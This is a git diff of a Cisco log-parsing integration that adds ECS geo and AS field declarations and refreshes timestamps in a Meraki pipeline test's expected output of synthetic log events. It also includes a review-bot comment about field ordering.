+ "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19",
 "code": "CALL_PRESERVED",
 "provider": "firewall",
 "category": "network",
diff --git a/packages/cisco/data_stream/ios/fields/ecs.yml b/packages/cisco/data_stream/ios/fields/ecs.yml
index 0439aa8651e..f1b640bd5ec 100644
--- a/packages/cisco/data_stream/ios/fields/ecs.yml
+++ b/packages/cisco/data_stream/ios/fields/ecs.yml
@@ -12,6 +12,12 @@
 name: destination.geo.country_iso_code
 - external: ecs
 name: destination.geo.country_name
+- external: ecs
 name: destination.geo.city_name
+- external: ecs
 name: destination.geo.region_iso_code
+- external: ecs
 name: destination.geo.region_name
 - description: Longitude and latitude.
 level: core
 name: destination.geo.location
@@ -82,5 +88,27 @@
 name: source.port
 - external: ecs
 name: source.user.name
+- external: ecs
 name: source.address
+- external: ecs
 name: source.as.number
+- external: ecs
 name: source.as.organization.name
+- external: ecs
 name: source.geo.continent_name
+- external: ecs
 name: source.geo.country_iso_code
+- external: ecs
 name: source.geo.country_name
+- external: ecs
 name: source.geo.city_name
+- external: ecs
 name: source.geo.region_iso_code
+- external: ecs
 name: source.geo.region_name
+- description: Longitude and latitude.
+ level: core
+ name: source.geo.location
+ type: geo_point
 - external: ecs
 name: tags
diff --git a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json
index 3e7fc8e3de5..8659ea62b8f 100644
--- a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json
+++ b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json
@@ -6,7 +6,7 @@
 },
 "message": "modtempo 1454047799.olab nto_ security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny",
 "event": {
- "ingested": "2021-07-19T09:06:57.318322723Z"
+ "ingested": "2021-12-09T13:33:18.888379800Z"
 },
 "tags": [
 "preserve_original_event"
@@ -18,7 +18,7 @@
 },
 "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu",
 "event": {
- "ingested": "2021-07-19T09:06:57.318328522Z"
+ "ingested": "2021-12-09T13:33:18.888383Z"
 },
 "tags": [
 "preserve_original_event"
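Review bot: The new `source.address`, `source.as.*` and `source.geo.*` entries are appended after `source.user.name`, while the surrounding entries appear to be kept in alphabetical order (`source.port`, `source.user.name`, `tags`, and in the earlier hunk `destination.geo.continent_name`, `country_iso_code`, `country_name`, `location`); all of the added names sort before `source.port`, so moving the block up keeps the file scannable and makes an accidental duplicate of an ECS field (for example a `source.address` or `source.as.number` already declared higher in the file, which is not visible here) easy to spot. The same ordering point applies to the earlier hunk of this file, where `destination.geo.city_name`, `region_iso_code` and `region_name` are inserted after `country_name` rather than in sorted position. Declaring `source.geo.location` inline with `description`/`level`/`type: geo_point` instead of `external: ecs` is consistent with the existing `destination.geo.location` entry, so that part is fine as written.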
@@ -30,7 +30,7 @@ }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "event": { - "ingested": "2021-07-19T09:06:57.318330876Z" + "ingested": "2021-12-09T13:33:18.888388400Z" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "event": { - "ingested": "2021-07-19T09:06:57.318332842Z" + "ingested": "2021-12-09T13:33:18.888393Z" }, "tags": [ "preserve_original_event" @@ -54,7 +54,7 @@ }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "event": { - "ingested": "2021-07-19T09:06:57.318334770Z" + "ingested": "2021-12-09T13:33:18.888397400Z" }, "tags": [ "preserve_original_event" @@ -66,7 +66,7 @@ }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "event": { - "ingested": "2021-07-19T09:06:57.318336673Z" + "ingested": "2021-12-09T13:33:18.888402700Z" }, "tags": [ "preserve_original_event" @@ -78,7 +78,7 @@ }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "event": { - "ingested": "2021-07-19T09:06:57.318338594Z" + "ingested": "2021-12-09T13:33:18.888407900Z" }, "tags": [ "preserve_original_event" @@ -90,7 +90,7 @@ }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "event": { - "ingested": "2021-07-19T09:06:57.318340690Z" + "ingested": "2021-12-09T13:33:18.888413100Z" }, "tags": [ "preserve_original_event" 
@@ -102,7 +102,7 @@ }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "event": { - "ingested": "2021-07-19T09:06:57.318342807Z" + "ingested": "2021-12-09T13:33:18.888418300Z" }, "tags": [ "preserve_original_event" @@ -114,7 +114,7 @@ }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "event": { - "ingested": "2021-07-19T09:06:57.318344851Z" + "ingested": "2021-12-09T13:33:18.888423400Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 mac=01:00:5e:aa:42:fa name=idolores sha256=llumquid disposition=tation action=accept", "event": { - "ingested": "2021-07-19T09:06:57.318346782Z" + "ingested": "2021-12-09T13:33:18.888428500Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "omn ipsumq.atcu oremagna_ security_event remipsum security_event liq signature=ist priority=tnon timestamp=1467632296.ionul shost=01:00:5e:c8:9c:2f direction=outbound protocol=udp src=10.163.72.17 dst=10.74.237.180 message:nsequu", "event": { - "ingested": "2021-07-19T09:06:57.318349047Z" + "ingested": "2021-12-09T13:33:18.888434400Z" }, "tags": [ "preserve_original_event" @@ -150,7 +150,7 @@ }, "message": "omm 1468867250.idestla Nemoeni_appliance events MAC 01:00:5e:c4:69:7f and MAC 01:00:5e:e2:67:d2 both claim IP: 10.72.31.26", "event": { - "ingested": "2021-07-19T09:06:57.318350932Z" + "ingested": "2021-12-09T13:33:18.888439600Z" }, "tags": [ "preserve_original_event" 
@@ -162,7 +162,7 @@ }, "message": "agna tionemu.eomnisis mqui ids-alerts signature=civeli priority=errorsi timestamp=1470102205.desdirection=internal protocol=tcp src=10.70.95.74:4290", "event": { - "ingested": "2021-07-19T09:06:57.318352814Z" + "ingested": "2021-12-09T13:33:18.888444800Z" }, "tags": [ "preserve_original_event" @@ -174,7 +174,7 @@ }, "message": "olupt 1471337159.dit sumquiad events MAC 01:00:5e:ea:e8:7a and MAC 01:00:5e:9c:d2:4a both claim IP: 10.17.21.125", "event": { - "ingested": "2021-07-19T09:06:57.318354694Z" + "ingested": "2021-12-09T13:33:18.888449900Z" }, "tags": [ "preserve_original_event" @@ -186,7 +186,7 @@ }, "message": "amqu 1472572113.uines nsec events dhcp lease of ip 10.85.10.165 from server mac 01:00:5e:63:93:48 for client mac 01:00:5e:46:17:35 from router 10.53.150.119 on subnet uiineavo with dns tisetq", "event": { - "ingested": "2021-07-19T09:06:57.318356610Z" + "ingested": "2021-12-09T13:33:18.888455Z" }, "tags": [ "preserve_original_event" @@ -198,7 +198,7 @@ }, "message": "giatquov eritquii.dexeac iscinge ids-alerts signature=atvol priority=umiur timestamp=1473807067.imadprotocol=igmp src=10.88.231.224 dst=10.187.77.245message: iadese", "event": { - "ingested": "2021-07-19T09:06:57.318360737Z" + "ingested": "2021-12-09T13:33:18.888460600Z" }, "tags": [ "preserve_original_event" @@ -210,7 +210,7 @@ }, "message": "agnaali 1475042022.gnam tat events content_filtering_block url='https://internal.example.com/quae/maccusa.htm?rQuisau=idex#xerci' category0='aqu' server='10.186.58.115:7238' client_mac='01:00:5e:8f:16:6d'", "event": { - "ingested": "2021-07-19T09:06:57.318362696Z" + "ingested": "2021-12-09T13:33:18.888465800Z" }, "tags": [ "preserve_original_event" 
@@ -222,7 +222,7 @@ }, "message": "apariat 1476276976.tlabore untmolli_ events dhcp lease of ip 10.219.84.37 from server mac 01:00:5e:e8:bf:69 for client mac 01:00:5e:87:e1:a0 from router 10.205.47.51 on subnet uovolup with dns samvolu", "event": { - "ingested": "2021-07-19T09:06:57.318364577Z" + "ingested": "2021-12-09T13:33:18.888471Z" }, "tags": [ "preserve_original_event" @@ -234,7 +234,7 @@ }, "message": "ento 1477511930.pic evita events MAC 01:00:5e:ce:61:db and MAC 01:00:5e:ec:f8:cc both claim IP: 10.3.134.237", "event": { - "ingested": "2021-07-19T09:06:57.318366481Z" + "ingested": "2021-12-09T13:33:18.888476100Z" }, "tags": [ "preserve_original_event" @@ -246,7 +246,7 @@ }, "message": "tmo 1478746884.fficiade uscipit events aid=vitaedi arp_resp=fugitse arp_src=veniamq auth_neg_dur=one auth_neg_failed=etMalor channel=ipi dns_req_rtt=reseos dns_resp=pariatu dns_server=tin duration=48.123000 full_conn=oquisqu identity=sperna ip_resp=eabilloi ip_src=10.182.178.217 is_8021x=tlab is_wpa=volupt last_auth_ago=osqui radio=xerc reason=iutali rssi=fdeFi type=texp vap=tasuntex client_mac=01:00:5e:e3:b1:24 client_ip=10.194.114.58 instigator=ectio http_resp=dutper dhcp_lease_completed=lamcolab dhcp_ip=ati dhcp_server=tlabo dhcp_server_mac=uames dhcp_resp=iduntu url=https://internal.example.net/ris/uamqu.txt?liqui=quioffi#uptate category0=ncidid server=10.63.194.87 vpn_type=quisno connectivity=sin", "event": { - "ingested": "2021-07-19T09:06:57.318368418Z" + "ingested": "2021-12-09T13:33:18.888479800Z" }, "tags": [ "preserve_original_event" 
@@ -258,7 +258,7 @@ }, "message": "emvel 1479981839.tmollita fde events aid=nsecte arp_resp=inculpa arp_src=abo auth_neg_dur=veniamqu auth_neg_failed=nse channel=non dns_req_rtt=paquioff dns_resp=mquisnos dns_server=maven duration=71.798000 full_conn=atcu identity=labor ip_resp=didunt ip_src=10.153.0.77 is_8021x=udan is_wpa=orema last_auth_ago=invento radio=qua reason=aturQui rssi=utlabor type=rau vap=idex client_mac=01:00:5e:9e:7b:a4 client_ip=10.105.88.20 instigator=ecte http_resp=tinvolu dhcp_lease_completed=iurer dhcp_ip=iciadese dhcp_server=quidolor dhcp_server_mac=tessec dhcp_resp=olupta url=https://mail.example.com/icabo/itatio.jpg?eleum=sintoc#volupt category0=siste server=10.163.154.210 vpn_type=ept connectivity=iumtotam", "event": { - "ingested": "2021-07-19T09:06:57.318370315Z" + "ingested": "2021-12-09T13:33:18.888483Z" }, "tags": [ "preserve_original_event" @@ -270,7 +270,7 @@ }, "message": "ionevo 1481216793.ugiatnu ciati_appliance events MAC 01:00:5e:b8:7a:96 and MAC 01:00:5e:b9:6b:a8 both claim IP: 10.73.69.176", "event": { - "ingested": "2021-07-19T09:06:57.318372187Z" + "ingested": "2021-12-09T13:33:18.888487100Z" }, "tags": [ "preserve_original_event" @@ -282,7 +282,7 @@ }, "message": "spi 1482451747.stquido ommodico_ flows ese flows allow src=10.145.248.111 dst=10.57.6.252 mac=01:00:5e:94:6a:cf protocol=udp ", "event": { - "ingested": "2021-07-19T09:06:57.318374272Z" + "ingested": "2021-12-09T13:33:18.888491800Z" }, "tags": [ "preserve_original_event" @@ -294,7 +294,7 @@ }, "message": "smo etcons.iusmodi uamest_ security_event uiac security_event epte signature=idolo priority=quinesc timestamp=1483686701.madmi shost=01:00:5e:1c:4c:64 direction=internal protocol=icmp src=10.31.77.157 dst=10.12.182.70 message:tev", "event": { - "ingested": "2021-07-19T09:06:57.318376267Z" + "ingested": "2021-12-09T13:33:18.888496400Z" }, "tags": [ "preserve_original_event" 
@@ -306,7 +306,7 @@ }, "message": "nisiuta 1484921656.roid inibusB flows cancel", "event": { - "ingested": "2021-07-19T09:06:57.318378206Z" + "ingested": "2021-12-09T13:33:18.888500Z" }, "tags": [ "preserve_original_event" @@ -318,7 +318,7 @@ }, "message": "str 1486156610.idolore pid_ flows cteturad flows deny src=10.93.68.231 dst=10.135.217.12 mac=01:00:5e:4a:69:5b protocol=ipv6 type=archite ", "event": { - "ingested": "2021-07-19T09:06:57.318380194Z" + "ingested": "2021-12-09T13:33:18.888504200Z" }, "tags": [ "preserve_original_event" @@ -330,7 +330,7 @@ }, "message": "amnih 1487391564.ium esciuntN_ events dhcp release for mac 01:00:5e:8b:99:98", "event": { - "ingested": "2021-07-19T09:06:57.318382141Z" + "ingested": "2021-12-09T13:33:18.888508100Z" }, "tags": [ "preserve_original_event" @@ -342,7 +342,7 @@ }, "message": "isnost 1488626519.queips ncidi_ flows iscinge flows src=10.247.30.212 dst=10.66.89.5 mac=01:00:5e:7f:65:da protocol=igmp pattern: 1 borios", "event": { - "ingested": "2021-07-19T09:06:57.318384064Z" + "ingested": "2021-12-09T13:33:18.888511700Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "oin 1489861473.mvenia madminim events IDS: fugitsed", "event": { - "ingested": "2021-07-19T09:06:57.318385940Z" + "ingested": "2021-12-09T13:33:18.888515700Z" }, "tags": [ "preserve_original_event" @@ -366,7 +366,7 @@ }, "message": "dmin fugi.quia iduntu security_event idestlab signature=rnatur priority=ofdeFin timestamp=1491096427.essequam dhost=01:00:5e:c1:53:b1 direction=inbound protocol=tcp src=10.221.102.245 dst=10.173.136.186 message:naal", "event": { - "ingested": "2021-07-19T09:06:57.318387828Z" + "ingested": "2021-12-09T13:33:18.888519100Z" }, "tags": [ "preserve_original_event" 
@@ -378,7 +378,7 @@ }, "message": "umqu tinv.adipisc uscipitl_ ids-alerts ritatise ids-alerts signature=uamei priority=siut timestamp=1492331381.ciad dhost=01:00:5e:1f:c6:29 direction=external protocol=udp src=10.58.64.108 dst=10.54.37.86 message: entorev", "event": { - "ingested": "2021-07-19T09:06:57.318389704Z" + "ingested": "2021-12-09T13:33:18.888523500Z" }, "tags": [ "preserve_original_event" @@ -390,7 +390,7 @@ }, "message": "velitess 1493566336.naali uunturm_ flows veli flows block src=10.147.76.202 dst=10.163.93.20 mac=01:00:5e:1d:85:ec protocol=ipv6 sport=1085 dport=3141 ", "event": { - "ingested": "2021-07-19T09:06:57.318392453Z" + "ingested": "2021-12-09T13:33:18.888528800Z" }, "tags": [ "preserve_original_event" @@ -402,7 +402,7 @@ }, "message": "iumdol tpersp.stla uptatema_ security_event uradi security_event tot signature=llamco priority=nea timestamp=1494801290.psum dhost=01:00:5e:35:71:1e direction=internal protocol=icmp src=10.0.200.27:5905 dst=10.183.44.198:1702 message:asiarc", "event": { - "ingested": "2021-07-19T09:06:57.318394459Z" + "ingested": "2021-12-09T13:33:18.888534Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "tiaec 1496036244.rumwrit icabo_ events dhcp lease of ip 10.148.124.84 from server mac 01:00:5e:0b:2c:22 for client mac 01:00:5e:06:12:98 from router 10.28.144.180 on subnet ritin with dns temporin", "event": { - "ingested": "2021-07-19T09:06:57.318396497Z" + "ingested": "2021-12-09T13:33:18.888539300Z" }, "tags": [ "preserve_original_event" 
@@ -426,7 +426,7 @@ }, "message": "ica 1497271198.lillum remips_appliance events aid=uisaute arp_resp=imide arp_src=poriss auth_neg_dur=tvolup auth_neg_failed=itesseq channel=dictasun dns_req_rtt=veniamqu dns_resp=rum dns_server=quaea duration=165.611000 full_conn=mvel identity=nof ip_resp=usmodi ip_src=10.204.230.166 is_8021x=dat is_wpa=aincidu last_auth_ago=nimadmin radio=isiu reason=licabo rssi=enimadmi type=utaliqu vap=dic client_mac=01:00:5e:bb:60:a6 client_ip=10.62.71.118 instigator=ineavol http_resp=iosa dhcp_lease_completed=boNemoe dhcp_ip=onsequ dhcp_server=equinesc dhcp_server_mac=cab dhcp_resp=atisund url=https://example.net/ites/isetq.gif?nisiut=tur#avolupt category0=ariatur server=10.98.194.212 vpn_type=nimave connectivity=isciv", "event": { - "ingested": "2021-07-19T09:06:57.318398565Z" + "ingested": "2021-12-09T13:33:18.888544400Z" }, "tags": [ "preserve_original_event" @@ -438,7 +438,7 @@ }, "message": "dipisci 1498506153.spernatu admi events content_filtering_block url='https://www.example.org/ueipsa/tae.html?eriti=atcupi#corpori' category0='borisnis' server='10.197.13.39:5912'", "event": { - "ingested": "2021-07-19T09:06:57.318400449Z" + "ingested": "2021-12-09T13:33:18.888549600Z" }, "tags": [ "preserve_original_event" @@ -450,7 +450,7 @@ }, "message": "itsedd 1499741107.leumiur eratvol events dhcp release for mac 01:00:5e:fd:84:bb", "event": { - "ingested": "2021-07-19T09:06:57.318402353Z" + "ingested": "2021-12-09T13:33:18.888554800Z" }, "tags": [ "preserve_original_event" @@ -462,7 +462,7 @@ }, "message": "leumiu tla.item nimid ids-alerts signature=dat priority=periam timestamp=1500976061.dquprotocol=icmp src=10.242.77.170 dst=10.150.245.88message: orisn", "event": { - "ingested": "2021-07-19T09:06:57.318404277Z" + "ingested": "2021-12-09T13:33:18.888560Z" }, "tags": [ "preserve_original_event" 
@@ -474,7 +474,7 @@ }, "message": "sitam rad.loi isc_ ids-alerts volupt ids-alerts signature=rem priority=idid timestamp=1502211015.tesse shost=01:00:5e:9d:eb:fb direction=external protocol=tcp src=10.247.139.239 dst=10.180.195.43 message: tenatuse", "event": { - "ingested": "2021-07-19T09:06:57.318406170Z" + "ingested": "2021-12-09T13:33:18.888565200Z" }, "tags": [ "preserve_original_event" @@ -486,7 +486,7 @@ }, "message": "tore 1503445970.elits consequa events dhcp release for mac 01:00:5e:50:48:c4", "event": { - "ingested": "2021-07-19T09:06:57.318408083Z" + "ingested": "2021-12-09T13:33:18.888570300Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "undeom uamnihi.risnis uov_ ids-alerts isn ids-alerts signature=sBono priority=loremqu timestamp=1504680924.teturprotocol=rdp src=10.94.6.140 dst=10.147.15.213message: uptat", "event": { - "ingested": "2021-07-19T09:06:57.318410091Z" + "ingested": "2021-12-09T13:33:18.888575500Z" }, "tags": [ "preserve_original_event" @@ -510,7 +510,7 @@ }, "message": "itasper 1505915878.uae mve_ flows obeata flows block src=10.230.6.127 dst=10.111.157.56 mac=01:00:5e:39:a7:fc protocol=icmp type=aliquamq ", "event": { - "ingested": "2021-07-19T09:06:57.318412002Z" + "ingested": "2021-12-09T13:33:18.888580600Z" }, "tags": [ "preserve_original_event" 
@@ -522,7 +522,7 @@ }, "message": "archite 1507150832.remq veniamq events aid=occ arp_resp=oloreseo arp_src=iruredol auth_neg_dur=veniamqu auth_neg_failed=licaboN channel=atquo dns_req_rtt=cupi dns_resp=strude dns_server=eritin duration=85.513000 full_conn=litsedq identity=nderiti ip_resp=ntNe ip_src=10.179.40.170 is_8021x=olorema is_wpa=mollita last_auth_ago=tatem radio=iae reason=quido rssi=emip type=inBC vap=mol client_mac=01:00:5e:58:2d:1c client_ip=10.153.81.206 instigator=rsita http_resp=nsequun dhcp_lease_completed=eetd dhcp_ip=illu dhcp_server=iatqu dhcp_server_mac=lorsi dhcp_resp=repreh url=https://www.example.net/irured/illumqui.txt?tionula=ritqu#ecatcupi category0=uamei server=10.193.219.34 vpn_type=onse connectivity=olorem", "event": { - "ingested": "2021-07-19T09:06:57.318413969Z" + "ingested": "2021-12-09T13:33:18.888585800Z" }, "tags": [ "preserve_original_event" @@ -534,7 +534,7 @@ }, "message": "umwritte 1508385787.vol oremquel_appliance events MAC 01:00:5e:16:5e:b1 and MAC 01:00:5e:ee:e8:77 both claim IP: 10.255.199.16", "event": { - "ingested": "2021-07-19T09:06:57.318415902Z" + "ingested": "2021-12-09T13:33:18.888590900Z" }, "tags": [ "preserve_original_event" @@ -546,7 +546,7 @@ }, "message": "unte 1509620741.uamnihil llam_appliance events MAC 01:00:5e:ee:1d:77 and MAC 01:00:5e:f1:21:bd both claim IP: 10.94.88.5", "event": { - "ingested": "2021-07-19T09:06:57.318425091Z" + "ingested": "2021-12-09T13:33:18.888596Z" }, "tags": [ "preserve_original_event" @@ -558,7 +558,7 @@ }, "message": "esci 1510855695.uov quaeab_ events IDS: moles", "event": { - "ingested": "2021-07-19T09:06:57.318431203Z" + "ingested": "2021-12-09T13:33:18.888601100Z" }, "tags": [ "preserve_original_event" @@ -570,7 +570,7 @@ }, "message": "accusa 1512090649.natu liquid events IDS: enim", "event": { - "ingested": "2021-07-19T09:06:57.318434018Z" + "ingested": "2021-12-09T13:33:18.888606300Z" }, "tags": [ "preserve_original_event" 
@@ -582,7 +582,7 @@ }, "message": "dquiaco nibus.vitaed ser security_event etconsec signature=elillum priority=upt timestamp=1513325604.rnat dhost=01:00:5e:01:60:e0 direction=internal protocol=ipv6 src=10.90.99.245 dst=10.124.63.4 message:pta", "event": { - "ingested": "2021-07-19T09:06:57.318439374Z" + "ingested": "2021-12-09T13:33:18.888611500Z" }, "tags": [ "preserve_original_event" @@ -594,7 +594,7 @@ }, "message": "tetura 1514560558.imadmini moe_appliance events content_filtering_block url='https://mail.example.net/uat/lupta.html?uptassit=ncidi#tlabori' category0='laudan' server='10.249.7.146:2010'", "event": { - "ingested": "2021-07-19T09:06:57.318441834Z" + "ingested": "2021-12-09T13:33:18.888615500Z" }, "tags": [ "preserve_original_event" @@ -606,7 +606,7 @@ }, "message": "lapar 1515795512.ritati edquia_appliance events IDS: itesse", "event": { - "ingested": "2021-07-19T09:06:57.318444124Z" + "ingested": "2021-12-09T13:33:18.888618600Z" }, "tags": [ "preserve_original_event" @@ -618,7 +618,7 @@ }, "message": "amvolu mip.tion tobeatae_ security_event Utenima security_event iqua signature=luptat priority=deriti timestamp=1517030466.sintocc dhost=01:00:5e:c9:b7:22 direction=inbound protocol=icmp src=10.196.96.162 dst=10.81.234.34 message:equuntur", "event": { - "ingested": "2021-07-19T09:06:57.318446164Z" + "ingested": "2021-12-09T13:33:18.888622900Z" }, "tags": [ "preserve_original_event" @@ -630,7 +630,7 @@ }, "message": "uide 1518265421.scivel henderi_appliance events IDS: iusmodt", "event": { - "ingested": "2021-07-19T09:06:57.318448051Z" + "ingested": "2021-12-09T13:33:18.888627600Z" }, "tags": [ "preserve_original_event" 
@@ -642,7 +642,7 @@ }, "message": "tiumd 1519500375.ntmoll mexer events dhcp lease of ip 10.40.101.224 from server mac 01:00:5e:0a:df:72 for client mac 01:00:5e:7c:01:ab with hostname remips188.api.invalid from router 10.78.199.43 on subnet ehender with dns ilmole", "event": { - "ingested": "2021-07-19T09:06:57.318449950Z" + "ingested": "2021-12-09T13:33:18.888632Z" }, "tags": [ "preserve_original_event" @@ -654,7 +654,7 @@ }, "message": "runtmo 1520735329.ore isund_appliance events MAC 01:00:5e:17:87:3e and MAC 01:00:5e:5f:c1:3e both claim IP: 10.244.29.119", "event": { - "ingested": "2021-07-19T09:06:57.318451848Z" + "ingested": "2021-12-09T13:33:18.888635600Z" }, "tags": [ "preserve_original_event" @@ -666,7 +666,7 @@ }, "message": "tutlabor 1521970284.reseosq gna_ flows pteurs flows deny src=10.83.131.245 dst=10.39.172.93 mac=01:00:5e:c4:12:c7 protocol=udp type=uido ", "event": { - "ingested": "2021-07-19T09:06:57.318453778Z" + "ingested": "2021-12-09T13:33:18.888639700Z" }, "tags": [ "preserve_original_event" @@ -678,7 +678,7 @@ }, "message": "osquira 1523205238.umd sciveli_ events dhcp lease of ip 10.86.188.179 from server mac 01:00:5e:48:4b:78 for client mac 01:00:5e:7e:cd:15 from router 10.201.168.116 on subnet umiure with dns laborum", "event": { - "ingested": "2021-07-19T09:06:57.318455700Z" + "ingested": "2021-12-09T13:33:18.888643600Z" }, "tags": [ "preserve_original_event" @@ -690,7 +690,7 @@ }, "message": "umdolors 1524440192.lumdo acom_ security_event umexercisecurity_event duntut url=https://mail.example.com/prehend/eufug.htm?eufug=est#civelits src=10.148.211.222:2053 dst=10.122.204.151:3903 mac=01:00:5e:c3:a0:dc name=ine sha256=urerepre disposition=asnulap action=deny", "event": { - "ingested": "2021-07-19T09:06:57.318457679Z" + "ingested": "2021-12-09T13:33:18.888647200Z" }, "tags": [ "preserve_original_event" 
@@ -702,7 +702,7 @@ }, "message": "atnul 1525675146.umfugi stquidol_ flows luptatem flows accept", "event": { - "ingested": "2021-07-19T09:06:57.318459592Z" + "ingested": "2021-12-09T13:33:18.888651300Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "essequam ueporro.aliqu upt ids-alerts signature=orum priority=Bonoru timestamp=1526910101.madminimprotocol=ipv6-icmp src=10.97.46.16 dst=10.120.4.9message: teni", "event": { - "ingested": "2021-07-19T09:06:57.318461514Z" + "ingested": "2021-12-09T13:33:18.888654800Z" }, "tags": [ "preserve_original_event" @@ -726,7 +726,7 @@ }, "message": "lorsitam tanimid.onpr litseddo_ ids-alerts oremqu ids-alerts signature=idex priority=radip timestamp=1528145055.uptaprotocol=ipv6-icmp src=10.171.206.139 dst=10.165.173.162message: lestia", "event": { - "ingested": "2021-07-19T09:06:57.318463427Z" + "ingested": "2021-12-09T13:33:18.888659100Z" }, "tags": [ "preserve_original_event" @@ -738,7 +738,7 @@ }, "message": "inibusB 1529380009.nostrud cteturad events dhcp lease of ip 10.150.163.151 from server mac 01:00:5e:72:b7:79 for client mac 01:00:5e:f2:d3:12 with hostname uames4985.mail.localdomain from router 10.144.57.239 on subnet oinBCSed with dns orem", "event": { - "ingested": "2021-07-19T09:06:57.318465372Z" + "ingested": "2021-12-09T13:33:18.888664300Z" }, "tags": [ "preserve_original_event" @@ -750,7 +750,7 @@ }, "message": "eritq rehen.ipsamvol elillum_ ids-alerts tco ids-alerts signature=tvol priority=oluptate timestamp=1530614963.lit shost=01:00:5e:ac:6d:d3 direction=unknown protocol=igmp src=10.52.202.158 dst=10.54.44.231 message: Ute", "event": { - "ingested": "2021-07-19T09:06:57.318467269Z" + "ingested": "2021-12-09T13:33:18.888669500Z" }, "tags": [ "preserve_original_event" 
@@ -762,7 +762,7 @@ }, "message": "runtm 1531849918.eturadip olorsi_ events MAC 01:00:5e:67:1d:0f and MAC 01:00:5e:f0:a9:cd both claim IP: 10.101.183.86", "event": { - "ingested": "2021-07-19T09:06:57.318477496Z" + "ingested": "2021-12-09T13:33:18.888674700Z" }, "tags": [ "preserve_original_event" @@ -774,7 +774,7 @@ }, "message": "inesciu 1533084872.quid atcupid_ flows orem flows src=10.71.22.225 dst=10.4.76.100 protocol=ggp pattern: allow serrorsi", "event": { - "ingested": "2021-07-19T09:06:57.318479911Z" + "ingested": "2021-12-09T13:33:18.888679800Z" }, "tags": [ "preserve_original_event" @@ -786,7 +786,7 @@ }, "message": "lamco 1534319826.cit siar events MAC 01:00:5e:80:cd:ca and MAC 01:00:5e:45:aa:51 both claim IP: 10.83.130.95", "event": { - "ingested": "2021-07-19T09:06:57.318481820Z" + "ingested": "2021-12-09T13:33:18.888685Z" }, "tags": [ "preserve_original_event" @@ -798,7 +798,7 @@ }, "message": "hite 1535554780.ianonnum nofdeFi events aid=henderit arp_resp=remq arp_src=unt auth_neg_dur=tla auth_neg_failed=arch channel=lite dns_req_rtt=ugia dns_resp=meum dns_server=borumSec duration=91.439000 full_conn=nvolupta identity=tev ip_resp=nre ip_src=10.2.110.73 is_8021x=eturadip is_wpa=ent last_auth_ago=rumSecti radio=Utenima reason=olore rssi=orumS type=olor vap=radip client_mac=01:00:5e:59:bf:36 client_ip=10.230.98.81 instigator=aaliquaU http_resp=olu dhcp_lease_completed=iameaque dhcp_ip=identsun dhcp_server=ender dhcp_server_mac=inc dhcp_resp=tect url=https://www.example.net/doconse/eni.html?mSec=smoditem#tatisetq category0=uidolo server=10.103.49.129 vpn_type=oquisq connectivity=abori", "event": { - "ingested": "2021-07-19T09:06:57.318483746Z" + "ingested": "2021-12-09T13:33:18.888690100Z" }, "tags": [ "preserve_original_event" 
